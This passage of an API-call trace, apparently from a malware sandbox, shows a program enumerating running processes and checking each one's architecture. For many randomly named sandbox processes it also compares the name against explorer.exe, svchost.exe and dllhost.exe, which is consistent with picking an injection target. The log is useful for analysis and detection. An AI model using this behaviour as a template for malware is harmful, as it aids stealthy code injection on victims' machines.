hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0201.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0201.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0201.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0201.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0201.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0201.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0201.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0201.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0201.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0201.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0201.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0201.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0201.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0201.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0201.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0201.244] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0201.244] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0201.245] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0201.245] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.245] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.245] CloseHandle (hObject=0xec) returned 1 [0201.245] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0201.246] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0201.246] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.246] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.246] CloseHandle (hObject=0xec) returned 1 [0201.246] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0201.247] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0201.247] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0201.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0201.248] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.248] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.248] CloseHandle (hObject=0xec) returned 1 [0201.248] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0201.248] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0201.248] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0201.248] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0201.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0201.249] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.249] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.249] CloseHandle (hObject=0xec) returned 1 [0201.249] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0201.249] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0201.249] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0201.249] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0201.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0201.250] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.250] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.250] CloseHandle (hObject=0xec) returned 1 [0201.250] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0201.250] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0201.250] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0201.250] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0201.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0201.250] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.250] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.250] CloseHandle (hObject=0xec) returned 1 [0201.250] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0201.250] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0201.251] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0201.251] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0201.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0201.251] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.251] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.251] CloseHandle (hObject=0xec) returned 1 [0201.251] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0201.251] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0201.251] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0201.251] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0201.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0201.252] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.252] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.252] CloseHandle (hObject=0xec) returned 1 [0201.252] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0201.252] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0201.252] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0201.252] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0201.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0201.252] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.252] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.253] CloseHandle (hObject=0xec) returned 1 [0201.253] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0201.253] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0201.253] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0201.253] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0201.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0201.253] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.253] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.253] CloseHandle (hObject=0xec) returned 1 [0201.253] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0201.253] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0201.253] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0201.253] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0201.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0201.254] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.254] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.254] CloseHandle (hObject=0xec) returned 1 [0201.254] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0201.254] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0201.254] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0201.254] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0201.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0201.255] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.255] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.255] CloseHandle (hObject=0xec) returned 1 [0201.255] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0201.255] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0201.255] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0201.255] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0201.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0201.255] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.255] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.255] CloseHandle (hObject=0xec) returned 1 [0201.255] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0201.255] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0201.255] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0201.255] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0201.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0201.256] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.256] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.256] CloseHandle (hObject=0xec) returned 1 [0201.256] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0201.256] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0201.256] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0201.256] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0201.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0201.257] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.257] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.257] CloseHandle (hObject=0xec) returned 1 [0201.257] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0201.257] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0201.257] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0201.257] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0201.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0201.257] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.257] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.258] CloseHandle (hObject=0xec) returned 1 [0201.258] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0201.258] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0201.258] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0201.258] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0201.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0201.258] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.258] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.258] CloseHandle (hObject=0xec) returned 1 [0201.258] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0201.258] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0201.258] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0201.258] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0201.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0201.259] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.259] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.259] CloseHandle (hObject=0xec) returned 1 [0201.259] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0201.259] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0201.259] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0201.259] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0201.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0201.260] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.260] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.260] CloseHandle (hObject=0xec) returned 1 [0201.260] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0201.260] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0201.260] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0201.260] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0201.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0201.260] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.260] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.260] CloseHandle (hObject=0xec) returned 1 [0201.260] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0201.260] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0201.260] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0201.260] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 